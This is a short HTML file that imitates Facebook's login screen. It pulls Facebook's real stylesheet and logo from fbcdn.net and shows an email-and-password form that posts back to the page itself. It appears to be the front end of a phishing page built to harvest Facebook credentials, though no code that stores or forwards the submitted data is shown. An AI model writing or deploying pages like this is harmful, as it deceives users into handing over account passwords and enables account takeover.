<!DOCTYPE html>
<html>
<head>
    <title>Facebook Login</title>
    <link rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yi/r/OBaVg52wtTZ.css">
</head>
<body>
    <form method="POST">
        <div class="login_form_container">
            <img src="https://static.xx.fbcdn.net/rsrc.php/yo/r/iRmGYK7i25O.svg" width="200">
            <input type="email" name="email" placeholder="Email or Phone Number" required>
            <input type="password" name="pass" placeholder="Password" required>
            <button type="submit">Log In</button>
        </div>
    </form>
</body>
</html>
